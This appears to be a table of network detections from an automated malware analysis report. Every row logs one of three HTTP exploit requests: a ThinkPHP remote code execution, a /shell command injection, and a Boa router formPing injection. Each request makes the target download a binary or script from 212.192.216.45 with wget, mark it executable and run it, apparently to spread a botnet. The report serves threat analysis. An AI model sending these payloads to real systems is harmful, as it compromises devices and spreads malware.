| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://212.192.216.45/netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%20selfrep.netlink%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://212.192.216.45/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp selfrep.thinkphp ; rm -rf thonkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: WW3V1SRC/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.192.216.45/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep.jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
